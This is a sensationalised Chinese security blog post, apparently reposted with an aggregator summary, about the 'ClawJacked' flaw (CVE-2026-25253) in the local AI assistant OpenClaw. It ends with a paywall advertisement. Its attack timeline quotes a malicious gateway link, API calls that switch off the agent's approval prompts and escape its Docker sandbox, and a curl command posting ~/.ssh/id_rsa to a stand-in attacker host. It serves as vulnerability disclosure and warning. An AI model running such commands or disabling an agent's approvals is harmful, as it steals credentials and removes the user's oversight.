文章总结： 文档披露本地AI助手OpenClaw存在高危漏洞CVE-2026-25253，攻击者利用WebSocket参数注入可在毫秒内窃取令牌并实现远程代码执行，威胁核心资产安全。文章详细描述了攻击链与危害，但核心原理分析需付费查看，具有软文性质，建议用户升级至v2026.1.29修复版本。 综合评分： 60 文章分类： AI安全,漏洞预警,漏洞分析,软文广告

【AI安全】AI安全再爆雷！OpenClaw 漏洞全景大揭秘

原创

Oxo Security Oxo Security

Oxo Security

2026年3月6日 19:36 吉林

一、惊天漏洞现身！本地 AI 助手 OpenClaw 沦为“肉鸡”生成器 😱

AI 时代！人人都在深耕 AI 安全，你缺的就是这关键一步！🚀

AI 正重塑安全边界，与其在门外徘徊，不如直接掌握主动权！

就在所有人都在疯狂追捧 AI 生产力工具的今天，安全界突然丢下了一颗“核弹”！💥 一个名为 ClawJacked（漏洞编号：CVE-2026-25253）的高危漏洞横空出世，直接将当红炸子鸡——开源本地 AI 助手 OpenClaw（以前叫 Moltbot 或 Clawdbot）钉在了安全耻辱柱上！🚨

这个漏洞的 CVSS 评分高达 8.8 分（绝对的高危级别）！8.8 分是什么概念？这意味着黑客根本不需要什么高深复杂的内网渗透技术，只要你手滑点错了一个网页链接，你的电脑在几毫秒之内就会彻底沦为黑客的“提线木马”！🎯

你以为把 AI 部署在本地（Localhost）就绝对安全了吗？你以为只要不对外网开放端口，黑客就拿你没办法了吗？大错特错！❌ OpenClaw 以本地 WebSocket 网关（默认傻乎乎地监听着 127.0.0.1:18789）为核心心脏，通过在本地执行系统命令，还非常贴心地帮你集成了 Slack、WhatsApp 等各种通讯大厂平台。它的初衷是为你提供一个高度自动化、懂你心思的 AI 贴身管家。🤖

但是，成也萧何败萧何！由于 OpenClaw 的核心受众绝大多数都是高级开发工程师、DevOps 运维大神、系统管理员等“特权阶层”👨‍💻👩‍💻。这些人的电脑里存着什么？满满的都是公司的核心源代码、生产服务器的 SSH 密钥、云厂商的最高权限 API Token、以及各类商业机密！🔑

CVE-2026-25253 漏洞极其残暴地撕裂了这层防护网： 远程躲在暗处的攻击者，仅仅需要精心伪造一个带有恶意 payload 的钓鱼链接 🎣。只要受害者在浏览器里轻轻点击了一下（甚至有时候只是不小心访问了一个被挂马的正常网页），在受害者完全没有任何察觉、没有任何弹窗警告的瞬间，OpenClaw 内部最核心的身份认证令牌（authToken）就被瞬间抽走！💸

紧接着，黑客利用这个令牌，就能直接冒充主人，对本地的 OpenClaw Agent 下达任意系统级别的指令（RCE，远程代码执行）。格式化你的硬盘？打包带走你的代码？悄悄种下勒索病毒？统统一键搞定！🔪

📅 来回顾一下这条让人心惊肉跳的“作案”时间线：

| 时间节点 | 事件动态记录 📝 | 行业震动程度 🫨 | | — | — | — | | 2026 年初 | 顶尖安全研究员 Mav Levin 在日常审计中偶然发现了这个致命缺陷，并迅速将其武器化，霸气命名为 “ClawJacked”（意为被爪子劫持）。 | ⚡⚡⚡ 内部安全圈炸锅，意识到这是一个“秒天秒地”的神洞。 | | 2026 年 1 月底 | OpenClaw 的核心开发者 Peter Steinberger 收到秘密通报后，满头大汗地连夜狂敲键盘，终于赶在月底发布了修补版本 v2026.1.29。 | 🛠️🛠️ 开发团队进入一级战备状态，紧急推送更新。 | | 2026 年 2 月初 | 漏洞细节被正式公开！更要命的是，包含完整漏洞利用链的 PoC（概念验证代码）直接被扔到了全球最大的同性交友网站 GitHub 上！ | 💣💣💣💣 真正的狂欢开始！黑客、脚本小子纷纷下载武器库。 | | 事件发酵至今 | 各大网络安全媒体（TheHackerNews、SonicWall等）争相报道这个“一键 RCE”惨案。 | 🌍🌍🌍 全球超过 15 万星标的项目、超十万活跃用户头顶悬着达摩克利斯之剑！ |

大家千万不要觉得事不关己高高挂！这个项目的 GitHub 仓库星标（Star）数量已经逼近 15 万大关，全球用户量更是妥妥的超过十万。这意味着现在互联网上到处都是处于“裸奔”状态的高价值目标。如果你或者你的企业团队还在用老版本的 OpenClaw，请立刻停下手中的一切工作，因为你的数字资产可能已经被黑客看光光了！👀

二、致命瞬间！受害者点开链接后到底发生了什么？☠️

用放大镜带你仔细观摩这场毫秒级的“屠杀”是如何发生的！我们要搞清楚，为什么这个漏洞会在安全圈引发如此巨大的恐慌，以及它如果发生在真实的企业环境中，会造成多么恐怖的毁灭性打击。🏙️🔥

为了让大家看得更直白，我们把整个复杂的利用链条，压缩在受害者点击鼠标的那一瞬间。从黑客视角来看，这是一场极其精密、无需任何人工干预的全自动流水线作业。

⏱️ 死亡倒计时：一键接管的全自动化攻击时间线

假设场景：公司里负责核心业务链的资深 DevOps 工程师小张，正在喝着咖啡 ☕。突然，他的开发者交流群（Discord/Slack）里弹出了一个链接：“*兄弟们快看，OpenClaw 最新的牛逼插件，用了效率翻倍！附链接：http://localhost:18789?gatewayUrl=wss://hack3r.io/trap*”。小张没多想，随手点开了链接。

就在这极其短暂的一秒钟内，以下恐怖的剧本已经在小张的电脑里偷偷演完了：

| 时间尺度 | 后台真实发生的安全事件（受害者完全无感） 👻 | 攻击阶段 | | — | — | — | | T+0 毫秒 | 小张点击链接。浏览器根据指令，立刻打开了本地的 localhost:18789 页面。 | 陷阱触发 🪤 | | T+10 毫秒 | OpenClaw 前端代码读取 URL，中了参数注入的招，将后端网关地址强行篡改为 wss://hack3r.io/trap。 | 毒药注入 💉 | | T+50 毫秒 | 浏览器自动向黑客服务器发起 WebSocket 握手，并且毫不吝啬地附带上了小张电脑里保存的 高权限 JWT 令牌。 | 凭证裸奔 🏃‍♂️💨 | | T+150 毫秒 | 黑客服务器秒级接收并解析 Token。随后，立刻利用 CSWSH 机制，反向指实施小张的浏览器去连接真正的本地网关。 | 反向控制 🎮 | | T+300 毫秒 | 黑客携带偷来的满级 Token，发送 API 请求：{"action": "exec.approvals.set", "value": "ask: off"}。所有安全弹窗被永久屏蔽！ | 哑巴刺客 🥷 | | T+450 毫秒 | 紧接着发送第二个请求：{"action": "config.patch", "env": "gateway"}。成功撕裂 Docker 沙箱，让执行环境跳跃到小张的 Mac/Windows 宿主机物理系统上。 | 越狱成功 🔓 | | T+600 毫秒 | 最后一步！黑客发送 node.invoke 指令。 Payload 是：curl -X POST -d @~/.ssh/id_rsa http://hack3r.io/receive。 | 图穷匕见 🔪 | | T+800 毫秒 | 小张电脑里价值连城的私钥（能登录公司生产服务器的 SSH Key），已经被打包并悄悄传回了黑客的服务器。 | 收割离场 💰 | | T+1000 毫秒(1秒) | 网页正常加载完毕。小张喝了一口咖啡，觉得这个插件好像没啥反应，随手关掉了网页。他永远不会知道，刚刚那一秒，他的职业生涯可能已经走向了尽头。 | 岁月静好 ☕（伪） |

看到了吗？整个流程像德芙巧克力一样丝滑 🍫！这属于典型的“一击必杀”式攻击链条！ 最恐怖的地方在于，所有的一切都是基于纯前端脚本与浏览器的“正常通信”完成的。没有往硬盘里下载可疑的 .exe 病毒，也没有执行什么底层的内存溢出操作。

这意味着什么？意味着你花大价钱买的传统杀毒软件、各种杀毒卫士，在这个攻击面前基本等于瞎子！🙈 因为所有的网络请求（WebSocket）和执行操作（OpenClaw 自身就是干执行命令这活儿的），在杀毒软件眼里都是完全合法的行为！这种利用应用层逻辑漏洞达到的“降维打击”，正是当前 AI 时代安全防范的巨大盲区。

☢️ 兵临城下：PoC 满天飞与企业核爆级风险评估

如果只是理论存在，那还不至于引起大面积恐慌。真正的绝望在于，这个漏洞的利用门槛低到了令人发指的地步！ 📉

在漏洞披露的几天内，大名鼎鼎的 DepthFirst 安全团队 就在他们的官方博客上，连篇累牍地详述了这条“一键 RCE”攻击链的每一个细节，并且非常“慷慨”地发布了配套的 exploit（漏洞利用）脚本！紧接着，无数安全研究员和脚本小子在 GitHub 上大肆 Fork 和分享完整的自动化利用工具包。🛠️

只要你会运行一个 Python 脚本，你就能在几秒钟内自动完成上述所有的连招。这意味着漏洞已经被高度**“武器化（Weaponized）”**！目前虽然还没有爆出导致跨国大公司瘫痪的大规模“在野利用（In-the-wild exploitation）”案例，但这只不过是暴风雨前可怕的宁静。社会工程学（比如钓鱼邮件、虚假技术论坛发帖）与这种自动化攻击工具一旦完美结合，对于任何公司来说都是一场噩梦！⛈️

我们来详细盘点一下，如果企业不幸中招，到底会面临哪些毁灭性的打击： 📉

1. 1. AI 凭证大逃亡（The Great AI Heist）： OpenClaw 作为 AI 助手，它的肚子里必然存着各种大模型的 API Key（比如 OpenAI、Anthropic 的高额度账号）。一旦漏洞触发，这些高价值的 Token 将被黑客一扫而空，拿到黑市上转卖。你的公司可能一夜之间就要为黑客的疯狂调用支付天价账单！💸
2. 2. 供应链与源码的“底裤”被看穿： 试想一下，受害者是一个高级后端开发。黑客拿到 RCE 权限后，完全可以写个脚本，遍历他电脑里的 ~/.aws/credentials（亚马逊云密钥）、~/.kube/config（K8s集群配置）、甚至直接把桌面上正在开发的、还没发布的最新产品源代码打包偷走。竞争对手拿到这些源码，后果不堪设想！🕵️‍♂️
3. 3. 内网横向移动的“绝佳跳板”： 这是所有企业安全总监（CISO）最害怕的一点。一台安装了 OpenClaw 的开发机，往往处在企业内网（VPN）的深处，能够访问各种不对外网公开的数据库、内部维基（Confluence）、源码仓库（GitLab）。黑客通过 ClawJacked 拿下这台机器后，它就不再仅仅是一个本地的问题了。黑客会以这台开发机为根据地，疯狂探测内网里的其他脆弱资产，最终把整个公司的网络底朝天地翻个遍。这种“从单点突破到全盘皆输”的剧本，在网络安全史上已经上演过无数次。🕸️

三、黑客视角的“夺命三连击”：ClawJacked 攻击原理深度大揭秘 🕵️‍♂️

🎯 【LLM 漏洞挖掘与攻击链分析】

为什么一个看似不起眼的 URL 参数，竟能无视层层内网防火墙，让坚固的防线在几毫秒内瞬间崩塌？黑客究竟是如何巧妙利用“夺命三连击”完成降维打击，实现从跨站劫持到沙箱逃逸的完美犯罪？

👉 想要获取完整的“夺命三连击”底层逻辑拆解与代码级漏洞利用分析，明确告知您：请立即加入 Oxo AI Security 知识星球 获取本章节完整硬核内容！星球内部不仅有这篇深度的原理解析，还沉淀了海量高价值干货

• • 📚 AI 文献解读：最前沿的 LLM 安全论文深度剖析。
• • 🐛 AI 漏洞情报：第一时间掌握主流大模型的 0-day 漏洞与越狱方式。
• • 🛡 AI 安全体系：从红队攻击到蓝队防御的全方位知识图谱。
• • 🛠 AI 攻防工具：红队专属的自动化测试与扫描工具箱。

🚀 立即加入 Oxo AI Security 知识星球，掌握AI安全攻防核心能力！

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：Oxo Security Oxo Security Oxo Security《【AI安全】AI安全再爆雷！OpenClaw 漏洞全景大揭秘》